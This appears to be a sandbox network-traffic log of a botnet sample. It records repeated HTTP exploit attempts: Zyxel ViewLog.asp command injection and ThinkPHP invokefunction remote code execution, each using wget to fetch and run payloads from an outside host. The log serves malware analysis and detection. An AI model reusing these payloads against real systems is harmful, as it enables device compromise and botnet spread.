                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 39 32 2e 31 36 38 2e 30 2e 31 34 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.18 (Ubuntu) Server at 192.168.0.14 Port 80</address></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            307192.168.2.235945831.136.56.1908080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:31.278239965 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:31.967179060 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:33.310718060 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:36.030332088 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:41.405581951 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:52.156105042 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:13.913045883 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:56.915070057 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            308192.168.2.234052285.208.120.78080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:31.325046062 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:31.569184065 CET1286INHTTP/1.0 400 Bad Request
                                                            Server: squid/3.1.23
                                                            Mime-Version: 1.0
                                                            Date: Wed, 14 Feb 2024 07:59:03 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 3167
                                                            X-Squid-Error: ERR_INVALID_URL 0
                                                            Connection: close
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 20 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 20 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 20 20 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 65 66 65 66 65 66 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 09 63 6f 6c 6f 72 3a 20 23 31 65 31 65 31 65 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 74 69 74 6c 65 20 61 72 65 61 20 2a 2f 0a 23 74 69 74 6c 65 73 20 7b 0a 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 31 35 70 78 3b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 30 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 71 75 69 64 2d 63 61 63 68 65 2e 6f 72 67 2f 41 72 74 77 6f 72 6b 2f 53 4e 2e 70 6e 67 27 29 20 6e 6f 2d 72 65 70 65 61 74 20 6c 65 66 74 3b 0a 7d 0a 0a 2f 2a 20 69 6e 69 74 69 61 6c 20 74 69 74 6c 65 20 2a 2f 0a 23 74 69 74 6c 65 73 20 68 31 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 23 74 69 74 6c 65 73 20 68 32 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 0a 2f 2a 20 73 70 65 63 69 61 6c 20 65 76 65 6e 74 3a 20 46 54 50 20 73 75 63 63 65 73 73 20 70 61 67 65 20 74 69 74 6c 65 73 20 2a 2f 0a 23 74 69 74 6c 65 73 20 66 74 70 73 75 63 63 65 73 73 20 7b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 66 66 30 30 3b 0a 09 77 69 64 74 68 3a 31 30 30 25 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 62 6f 64 79 20 63 6f 6e 74 65 6e 74 20 61 72 65 61 20 2a 2f 0a 23 63 6f 6e 74 65 6e 74 20 7b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 66 66 66
                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>ERROR: The requested URL could not be retrieved</title> <style type="text/css">... /* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background: #efefef;font-size: 12px;color: #1e1e1e;}/* Page displayed title area */#titles {margin-left: 15px;padding: 10px;padding-left: 100px;background: url('http://www.squid-cache.org/Artwork/SN.png') no-repeat left;}/* initial title */#titles h1 {color: #000000;}#titles h2 {color: #000000;}/* special event: FTP success page titles */#titles ftpsuccess {background-color:#00ff00;width:100%;}/* Page displayed body content area */#content {padding: 10px;background: #ffffff


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            309192.168.2.235438494.122.69.1408080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:31.328242064 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            310192.168.2.234277095.140.239.10780
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:32.587064028 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:28:33.184808016 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:28:33.378659964 CET269INHTTP/1.1 400 Bad Request
                                                            Server: EdgePrism/5.1.7.0
                                                            Mime-Version: 1.0
                                                            Date: Wed, 14 Feb 2024 08:28:33 GMT
                                                            Content-Type: text/plain
                                                            Expires: Wed, 14 Feb 2024 08:28:33 GMT
                                                            X-LLID: ead1b042058262a70186fcdf1cc171a3
                                                            Content-Length: 0
                                                            Connection: close


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            311192.168.2.234017095.85.47.25080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:32.587178946 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:28:32.791559935 CET323INHTTP/1.1 400 Bad Request
                                                            Server: nginx
                                                            Date: Wed, 14 Feb 2024 08:28:32 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 166
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            312192.168.2.234048695.100.72.9580
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:32.588378906 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:28:32.794476986 CET480INHTTP/1.0 400 Bad Request
                                                            Server: AkamaiGHost
                                                            Mime-Version: 1.0
                                                            Content-Type: text/html
                                                            Content-Length: 258
                                                            Expires: Wed, 14 Feb 2024 08:28:32 GMT
                                                            Date: Wed, 14 Feb 2024 08:28:32 GMT
                                                            Connection: close
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 61 30 37 61 37 62 35 63 26 23 34 36 3b 31 37 30 37 38 39 39 33 31 32 26 23 34 36 3b 34 63 30 32 66 34 66 65 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;a07a7b5c&#46;1707899312&#46;4c02f4fe</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            313192.168.2.234708495.216.92.7580
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:32.605834961 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:28:32.825831890 CET307INHTTP/1.1 400 Bad Request
                                                            Server: nginx
                                                            Date: Wed, 14 Feb 2024 08:28:32 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 150
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            314192.168.2.235410095.188.70.3880
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:32.692836046 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:28:32.991307974 CET321INHTTP/1.1 400 Bad Request
                                                            Server: nginx/1.22.1
                                                            Date: Wed, 14 Feb 2024 08:28:32 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 157
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.22.1</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            315192.168.2.233646831.136.227.2238080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:32.794575930 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:33.438726902 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:34.686534882 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:37.310198069 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:42.429419994 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
